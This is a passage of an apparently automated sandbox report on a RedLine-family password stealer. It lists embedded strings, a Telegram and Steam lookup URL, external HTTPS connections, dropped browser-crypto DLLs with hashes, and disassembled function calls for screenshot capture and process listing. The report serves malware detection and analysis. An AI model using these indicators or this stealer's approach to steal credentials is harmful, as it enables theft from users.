Source: CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://system.data.sqlite.org/
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://system.data.sqlite.org/X
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfail
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe, 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://t.me/irfailAt
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://urn.to/r/sds_see
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: https://urn.to/r/sds_see=isolation
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: BKEBFHIJ.3.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: BKEBFHIJ.3.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://www.sqlite.org/lang_aggfunc.html
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: https://www.sqlite.org/lang_corefunc.html
Source: RegAsm.exe, 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp, 76561199673019888[1].htm.3.dr String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411D10 memset,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GlobalFix,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00411D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C85B8C0 rand_s,NtQueryVirtualMemory, 3_2_6C85B8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C85B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6C85B910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C85B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C85B700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C7FF280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6154D 0_2_00F6154D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F73080 0_2_00F73080
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F97261 0_2_00F97261
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6122F 0_2_00F6122F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F983DF 0_2_00F983DF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6E388 0_2_00F6E388
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F694C8 0_2_00F694C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F977B2 0_2_00F977B2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F998E8 0_2_00F998E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F97D03 0_2_00F97D03
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F65F8F 0_2_00F65F8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6DF00 0_2_00F6DF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041D38A 3_2_0041D38A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041F4C0 3_2_0041F4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041CE39 3_2_0041CE39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041DFB7 3_2_0041DFB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F35A0 3_2_6C7F35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C806C80 3_2_6C806C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C836CF0 3_2_6C836CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C86AC00 3_2_6C86AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C835C10 3_2_6C835C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C842C10 3_2_6C842C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C830DD0 3_2_6C830DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80FD00 3_2_6C80FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81ED10 3_2_6C81ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C815E90 3_2_6C815E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C854EA0 3_2_6C854EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80FEF0 3_2_6C80FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FBEF0 3_2_6C7FBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C837E10 3_2_6C837E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C859E30 3_2_6C859E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C842E4E 3_2_6C842E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C819E50 3_2_6C819E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C833E50 3_2_6C833E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C866E63 3_2_6C866E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C826FF0 3_2_6C826FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C809F00 3_2_6C809F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FDFE0 3_2_6C7FDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8358E0 3_2_6C8358E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C807810 3_2_6C807810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83B820 3_2_6C83B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C844820 3_2_6C844820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C818850 3_2_6C818850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81D850 3_2_6C81D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C852990 3_2_6C852990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C82D9B0 3_2_6C82D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81A940 3_2_6C81A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FC9A0 3_2_6C7FC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80D960 3_2_6C80D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C84B970 3_2_6C84B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C86BA90 3_2_6C86BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C824AA0 3_2_6C824AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80CAB0 3_2_6C80CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C862AB0 3_2_6C862AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C838AC0 3_2_6C838AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C811AF0 3_2_6C811AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C839A60 3_2_6C839A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8534A0 3_2_6C8534A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C85C4A0 3_2_6C85C4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8064C0 3_2_6C8064C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81D4D0 3_2_6C81D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FD4E0 3_2_6C7FD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C86542B 3_2_6C86542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C805440 3_2_6C805440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C86545C 3_2_6C86545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8585F0 3_2_6C8585F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C820512 3_2_6C820512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C85E680 3_2_6C85E680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FC670 3_2_6C7FC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8676E3 3_2_6C8676E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C845600 3_2_6C845600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C814640 3_2_6C814640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8477A0 3_2_6C8477A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C837710 3_2_6C837710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8260A0 3_2_6C8260A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8650C7 3_2_6C8650C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C81C0E0 3_2_6C81C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83F070 3_2_6C83F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C835190 3_2_6C835190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C86B170 3_2_6C86B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83E2F0 3_2_6C83E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F22A0 3_2_6C7F22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7F5340 3_2_6C7F5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8653C8 3_2_6C8653C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C83D320 3_2_6C83D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C80C370 3_2_6C80C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C7FF380 3_2_6C7FF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C89ECC0 3_2_6C89ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8FECD0 3_2_6C8FECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C966C00 3_2_6C966C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C97AC30 3_2_6C97AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8AAC60 3_2_6C8AAC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C936D90 3_2_6C936D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8A4DB0 3_2_6C8A4DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CA2CDC0 3_2_6CA2CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6CA28D20 3_2_6CA28D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C9CAD50 3_2_6C9CAD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C96ED70 3_2_6C96ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C926E90 3_2_6C926E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C8AAEC0 3_2_6C8AAEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C940EC0 3_2_6C940EC0
Source: Joe Sandbox View Dropped File: C:\ProgramData\CAFIJKFHIJ.exe 9BFE195AAEE63E17887A211D9C9D88F819E5B49B19FD6DEA1EC020DACBE8B34E
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: String function: 00F62440 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C82CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8394D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00402360 appears 286 times
Source: Soft123[1].exe.3.dr Static PE information: No import functions for PE file found
Source: CAFIJKFHIJ.exe.3.dr Static PE information: No import functions for PE file found
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@16/26@2/3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C857030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 3_2_6C857030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00410AA0 CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle, 3_2_00410AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411020 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear, 3_2_00411020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199673019888[1].htm
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
Source: C:\ProgramData\CAFIJKFHIJ.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6252:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sqln[1].dll.3.dr, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.3.dr, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
